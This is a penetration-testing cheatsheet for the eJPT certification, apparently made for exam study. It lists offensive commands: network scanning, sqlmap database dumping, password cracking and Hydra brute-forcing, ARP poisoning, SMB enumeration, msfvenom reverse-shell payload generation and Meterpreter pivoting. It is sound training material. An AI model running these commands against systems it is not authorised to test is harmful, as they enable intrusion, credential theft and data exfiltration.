└── eJPT Cheatsheet.md


/eJPT Cheatsheet.md:
--------------------------------------------------------------------------------
  1 | # Nmap
  2 | ___
  3 | #### Ping Sweep
  4 | ```sh
  5 | nmap -sn <CIDR Notation>        #Finding alive IP addresses in the subnet
  6 | ```
  7 | You can also perform ping sweep using fping tool
  8 | ```
  9 | fping -a -g 10.54.12.0/24 2>/dev/null
 10 | ```
 11 | 
 12 | Now you need to find open ports on each alive IP, you can perform this using two methods
 13 | #### METHOD - 1
 14 | Perform aggressive scan on all ports which might do not required to be scanned. This could cost you time and give results which might not be useful.
 15 | ```sh
 16 | nmap -p- -A -Pn -iL hosts.txt       # hosts.txt file contains the alive host addresses
 17 | ```
 18 | #### METHOD - 2
 19 | This method first find the open ports and after this you can perform aggressive scan on particular port. This method do not probe all the available ports blindly and you can choose which port might be useful to you to scan.
 20 | 
 21 | ```sh
 22 | nmap -p- -T4 -Pn -vv -iL hosts.txt      # This will give you all the open ports on hosts provided using hosts.txt file
 23 | 
 24 | nmap -p<ports> -A -Pn -vv <IP>      # This will only probe ports selected by you for particular IP
 25 | ```
 26 | 
 27 | 
 28 | # Analyzing HTTP and HTTPS
 29 | ___
 30 | 
 31 | #### HTTP
 32 | ```sh
 33 | nc -v www.abc.com 80        # After pressing enter you are prompted to send some data
 34 | 
 35 | Type two lines given below and press enter two times to get http response
 36 | GET / HTTP/1.1
 37 | Host: www.abc.com 
 38 | ```
 39 | #### HTTPs
 40 | ```sh
 41 | openssl s_client -connect hack.me 443       # Establish ssl connection
 42 | ```
 43 | After establishing ssl connection you can proceed like nc prompt
 44 | 
 45 | # Checking Routes and Adding Manual Routes
 46 | ___
 47 | 
 48 | #### Checking Routes
 49 | ```
 50 | ip route    # Checking defined routes in linux
 51 | route       # Checking defined routes in linux
 52 | route print     # Checking defined routes in windows
 53 | ```
 54 | #### Adding Manual Routes
 55 | ```sh
 56 | ip route add <subnet> via <gateway or router address>
 57 | ```
 58 | for example,
 59 | ```sh
 60 | ip route add 192.168.222.0/24 via 10.172.24.1       # Here 10.172.24.1 is the address of the gateway for subnet 192.168.222.0/24
 61 | ```
 62 | 
 63 | 
 64 | # Finding MAC Addresses
 65 | ___
 66 | 
 67 | ```
 68 | ipconfig /all       # windows
 69 | ifconfig        # *nix OSs
 70 | ip addr     # linux
 71 | ```
 72 | 
 73 | # Checking ARP Cache
 74 | ___
 75 | 
 76 | 
 77 | ```
 78 | arp -a      # Windows
 79 | arp     # *nix OSs
 80 | ip neighbour        # Linux 
 81 | ```
 82 | # Checking for Listening Ports on a Host
 83 | ___
 84 | ```
 85 | netstat -ano        # Windows
 86 | netstat -tunp       # linux
 87 | ```
 88 | 
 89 | # SQLmap
 90 | ___
 91 | 
 92 | #### Checking for existence of SQL injection
 93 | ```sh
 94 | sqlmap -u ‘http://example.com/view.php?id=1141’ -p id       # GET Method
 95 | 
 96 | sqlmap -u ‘http://example.com/view.php’ --data <POST String> -p <parameter>     # POST Method
 97 | ```
 98 | If vulnerable parameter found then you can proceed with extraction of data from database
 99 | ```sh
100 | sqlmap -u ‘http://example.com/view.php?id=1141’ --dbs     # Getting database names
101 | sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> --tables   # Getting table names
102 | sqlmap -u ‘http://example.com/view.php?id=1141’ -D <db_name> -T <tbl_name> --columns    # Getting columns
103 | sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> -T <tbl_name> -C <column_name_comma_separate> --dump # To dump whole table remove column specification from the command and use only --dump option
104 | ```
105 | # John-The-Ripper
106 | ___
107 | ```sh
108 | john --list=formats
109 | john -incremental -users:<users list> <file to crack>       # if you want to crack only certain users from the password database such as /etc/shadow file
110 | john --show crackme     # Check cracked password after completion of cracking session, where crackme is the password database file
111 | john -wordlist=<wordlist> <file to crack>
112 | john -wordlist=<wordlist> -rules <file to crack>        # rules are used for cracking mangling words such as for cat mangling words could be c@t,caT,CAT,CaT
113 | ```
114 | # Hydra
115 | ___
116 | 
117 | ```sh
118 | hydra -U ftp        # hydra uses module for each service to attack. To get information about a module this command can be used
119 | hydra -L users.txt -P pass.txt <service://server> <options>
120 | hydra -l admin -P pass.txt -f ftp://10.10.10.10        # Stop attacking on finding first successful hit for user admin
121 | hydra  -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V    # Attacking http post form
122 | ```
123 | 
124 | # Hashcat
125 | ___
126 | 
127 | ```sh
128 | hashcat -m 0 -a 0 exam.hash file.dict
129 | hashcat -m 0 -a 0 exam.hash file.dict -r rule/custom.rule       # here rule file contains the rules to creat mangling word such as p@ssword, PaSSworD  https://hashcat.net/wiki/doku.php?id=rule_based_attack 
130 | hashcat -m 0 -a 3 exam.hash ?l?l?l?l?l?a        # https://hashcat.net/wiki/doku.php?id=mask_attack
131 | ```
132 | # SMB Enumeration
133 | ___
134 | 
135 | #### enum4linux
136 | ```sh
137 | enum4linux -a <ip>      # Enumerating using enum4linux tool
138 | ```
139 | #### smbclient
140 | ```sh
141 | smbclient -L //IP -N    # Checking for available shares
142 | smbclient //<target IP>/IPC$ -N     # Connecting to a share
143 | ```
144 | #### nmap scripts
145 | ```sh
146 | nmap -p445 --script=smb-vuln-* <IP> -v      # This will run all the smb-vuln scripts, if you want to run only few scripts then you can check other available scripts in /usr/share/nmap/scripts
147 | ```
148 | # Checking for anonymous FTP 
149 | ___
150 | ```sh
151 | ftp <IP>        # enter 'anonymous' as username and password
152 | ```
153 | # ARP Poisoning
154 | ___
155 | ```sh
156 | echo 1 > /proc/sys/net/ipv4/ip_forward      # enabling Linux Kernel IP Forwarding, to enable forwarding packet to real destination host
157 | arpspoof -i <interface> -t <target> -r <host>       # if arpspoof do not work then install dsniff which includes this tool also
158 | ```
159 | # MySQL
160 | ___
161 | 
162 | If you find mysql information then you can try connecting to mysql service remotely.
163 | ```sh
164 | mysql -u <user> -p<password> -h <IP> -D <dbname>
165 | ```
166 | # Directory busting
167 | ___
168 | #### dirb
169 | ```sh
170 | dirb http://<IP>/
171 | dirb http://<IP>/ <dictionary_file_path>    # Use dictionary other than default one
172 | dirb http://<IP>/dir -u admin:admin    # When you want to bust recursively but a dir asks for username password which you know already 
173 | ```
174 | #### gobuster
175 | ```sh
176 | gobuster dir --url http://<IP>/ --wordlist=<wordlist_file_path>     # -t <value> for more threads
177 | gobuster dir --url http://<IP>/dir --wordlist=<wordlist_file_path> -U username -P password
178 | ```
179 | 
180 | # MsfVenom Payload Creation
181 | ___
182 | ```sh
183 | msfvenom -p <payload_path> LHOST=<IP> LPORT=<PORT> -f <format> -o shell
184 | ```
185 | Check [this](https://netsec.ws/?p=331) for some useful payloads
186 | 
187 | # Meterpreter Autoroute
188 | ___
189 | 
190 | ```
191 | meterpreter> run autoroute -s <subnet>
192 | meterpreter > run autoroute -p      # show active route table
193 | 
194 | 


--------------------------------------------------------------------------------